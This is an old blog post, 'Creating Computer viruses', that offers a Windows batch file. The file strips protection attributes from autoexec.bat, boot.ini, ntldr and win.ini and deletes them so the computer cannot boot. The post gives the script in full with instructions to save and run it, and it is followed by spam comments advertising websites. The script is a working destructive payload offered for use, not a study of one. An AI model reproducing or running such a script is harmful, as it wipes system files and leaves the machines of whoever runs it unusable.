Pages

Tuesday, July 21, 2009

Creating Computer viruses

In this post I will say how to create some more dangerous application. Activating this will shut down the computer after deleting the files required for booting and not boot during restart. So handle with care otherwise it will end up in the permanent crash. Please do not use this to harm others. I found it from Garena.com.

Open a notepad and type the following and save it as "filename.bat" file.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Add to Technorati Favorites Bookmark and Share





3 comments:

  1. Yeah I heard about them and spotted some of them in my computer. the source that told me was this site's newsletter. http://www.systemsecurityinstitute.org They really help a lot about some other latest so I kind a reacted soon after I read the news.

    ReplyDelete
  2. yeah friend me too hear about it through my friend Venus.Review Of Regcure

    ReplyDelete
  3. BuxUp.com is free of any viruses and safe than ever before: http://www.buxup.com

    ReplyDelete